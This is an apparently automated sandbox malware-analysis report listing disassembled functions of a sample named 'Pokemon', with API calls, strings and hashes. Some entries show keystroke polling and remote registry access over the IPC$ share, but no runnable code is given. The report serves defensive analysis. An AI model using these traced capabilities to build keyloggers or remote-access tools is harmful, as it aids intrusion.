                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                      • String ID: BUTTON
                                                                                                                                                                                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                      • Opcode ID: ef10616cf768b4fde8417ee6a69f4b782665259ce11359260255e82a27cf24db
                                                                                                                                                                                                                                                                                      • Instruction ID: 8cd04537658df189f9a8ea27987c234efe8f801be499424e8232ce3c1942187e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef10616cf768b4fde8417ee6a69f4b782665259ce11359260255e82a27cf24db
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD219F71600249BFE7206F20FC89B367BAAFB59745B004024F60182E73DFB58E95AA51
                                                                                                                                                                                                                                                                                      Function 000FF313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 000FF374
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 000FF38A
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000FF39B
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 000FF3AD
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 000FF3BE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                      • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                      • Opcode ID: e96636cdcb8b8888733524e70f68357fc431d63dd7028d3aa0144c17e104148d
                                                                                                                                                                                                                                                                                      • Instruction ID: 604940d7d3bb469dd2dec284485dca1fe94fdbe1a007b75437db284b762ec123
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e96636cdcb8b8888733524e70f68357fc431d63dd7028d3aa0144c17e104148d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7811E031A9021DB9DB20A361EC0AEFF7ABCEFC2B10F0004297911E60D1EBA01A48D5F0
                                                                                                                                                                                                                                                                                      Function 000FA958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 000FA9D9
                                                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 000FAA44
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 000FAA64
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 000FAA7B
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 000FAAAA
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 000FAABB
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 000FAAE7
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 000FAAF5
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 000FAB1E
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 000FAB2C
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 000FAB55
                                                                                                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 000FAB63
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f438f0d6b0fc01c439205880cf72772263d286fe709ab212d36eb37fdf801f40
                                                                                                                                                                                                                                                                                      • Instruction ID: 711ed9f9ec5df5be9850b5c8172600d2fd711f884e27bf8feed070bbfbb6f39a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f438f0d6b0fc01c439205880cf72772263d286fe709ab212d36eb37fdf801f40
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D951D7A0B0878C29EB75D7608850BFABFF55F03740F08459986C6169C3DB989B4CDB63
                                                                                                                                                                                                                                                                                      Function 000F662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 000F6649
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000F6662
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 000F66C0
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 000F66D0
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000F66E2
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 000F6736
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 000F6744
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000F6756
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 000F6798
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 000F67AB
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000F67C1
                                                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 000F67CE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5c7d938415c2cd76a8c7d1efe2f5e121250f94234609386a342f8992f030ca4e
                                                                                                                                                                                                                                                                                      • Instruction ID: 96fb65fcced41263668f7cf8061f289faafa824df9196f8c0169765a6d35f1aa
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c7d938415c2cd76a8c7d1efe2f5e121250f94234609386a342f8992f030ca4e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E513EB0A00209AFDF18CF68DD89AAEBBB5FB48315F108129F919E7690D771AD51CB50
                                                                                                                                                                                                                                                                                      Function 0009146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00091488,?,00000000,?,?,?,?,0009145A,00000000,?), ref: 00091865
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00091521
                                                                                                                                                                                                                                                                                      • KillTimer.USER32(00000000,?,?,?,?,0009145A,00000000,?), ref: 000915BB
                                                                                                                                                                                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 000D29B4
                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0009145A,00000000,?), ref: 000D29E2
                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0009145A,00000000,?), ref: 000D29F9
                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0009145A,00000000), ref: 000D2A15
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 000D2A27
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 641708696-0
                                                                                                                                                                                                                                                                                      • Opcode ID: dc6a9dc53a2cf66cbd6465926244d3acc703044a0071dd932687217e4fa27419
                                                                                                                                                                                                                                                                                      • Instruction ID: fab64c92137ef43a97392f14229a0bbf5bbaecaab47591905a70f7fb877b66e1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc6a9dc53a2cf66cbd6465926244d3acc703044a0071dd932687217e4fa27419
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F619D30601B22EFDB759F18DD48BAAB7F1FB94316F114019E04296A70C774A8D2EF55
                                                                                                                                                                                                                                                                                      Function 00092128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00092234: GetWindowLongW.USER32(?,000000EB), ref: 00092242
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00092152
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 21cecb57204fbb22d022ee55be12d45fb142010bdbdf82ff2d4b6508aa3237f4
                                                                                                                                                                                                                                                                                      • Instruction ID: 7330be48433516888adad94c5dfca20facad903b0b998e045b2db09e4754f40e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21cecb57204fbb22d022ee55be12d45fb142010bdbdf82ff2d4b6508aa3237f4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B419E31200640BFDF345F38EC48BB937A5AB52320F154255EAA2876E5C7319DA2EB21
                                                                                                                                                                                                                                                                                      Function 000FA05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,000E0D31,00000001,0000138C,00000001,00000000,00000001,?,0010EEAE,00162430), ref: 000FA091
                                                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,000E0D31,00000001), ref: 000FA09A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,000E0D31,00000001,0000138C,00000001,00000000,00000001,?,0010EEAE,00162430,?), ref: 000FA0BC
                                                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,000E0D31,00000001), ref: 000FA0BF
                                                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000FA1E0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                      • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                      • Opcode ID: 3be1de2291b58869fcefd02b395c872de43ce84d27230f4c28aa4940ba956587
                                                                                                                                                                                                                                                                                      • Instruction ID: af869d8be25366f9aca051fbe1c8bed73822332e270b483eb027d4829f759569
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3be1de2291b58869fcefd02b395c872de43ce84d27230f4c28aa4940ba956587
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D841307290010DAACF15EBE0EE86DEEB778AF19300F500065F605B6493EB756F49EB61
                                                                                                                                                                                                                                                                                      Function 000F0FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000F1093
                                                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000F10AF
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000F10CB
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000F10F5
                                                                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 000F111D
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000F1128
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000F112D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                      • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                      • Opcode ID: f54a4d6d9c5e20bd5edf24b7f3b1f8e992aedd0efa1f48b85667f7ec488c8cc7
                                                                                                                                                                                                                                                                                      • Instruction ID: 41fb59f5e445f7251d3132efa9dc03ea5653805ad98a87becfd80c292c12c068
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f54a4d6d9c5e20bd5edf24b7f3b1f8e992aedd0efa1f48b85667f7ec488c8cc7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44410672C1022DEBCF21EBA4EC85DEEB7B8BF04750F404129E901A3561EB719E49DB90
                                                                                                                                                                                                                                                                                      Function 00124A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00124AD9
                                                                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00124AE0
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00124AF3
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00124AFB
                                                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00124B06
                                                                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00124B10
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00124B1A
                                                                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00124B30
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00124B3C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                      • Opcode ID: 71f043c37bc5dd6fcea364bb1cdf4a621dcb3ca62037952e5360b52174dfa9d6
                                                                                                                                                                                                                                                                                      • Instruction ID: 38f58aa3afda986a41b38c85733391217bf3260685b4cefb1feb1094b8ace045
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71f043c37bc5dd6fcea364bb1cdf4a621dcb3ca62037952e5360b52174dfa9d6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5316D32100225BBDF229FA4EC08FDA3BA9FF0D364F110215FA15A61A0C775D8B1DB94
                                                                                                                                                                                                                                                                                      Function 0011468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 001146B9
                                                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 001146E7
                                                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 001146F1
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0011478A
                                                                                                                                                                                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 0011480E
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00114932
                                                                                                                                                                                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0011496B
                                                                                                                                                                                                                                                                                      • CoGetObject.OLE32(?,00000000,00130B64,?), ref: 0011498A
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 0011499D
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00114A21
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00114A35
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                      • Opcode ID: fc0340dedd5d15a10cadd2ef985057eed3522db2f6b837ceb8d786fbced6d1f3
                                                                                                                                                                                                                                                                                      • Instruction ID: 6a62795f0a5f549ac73df1c8fa7fcbf19536665cfe76a31a409bfb1c9f567cf9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc0340dedd5d15a10cadd2ef985057eed3522db2f6b837ceb8d786fbced6d1f3
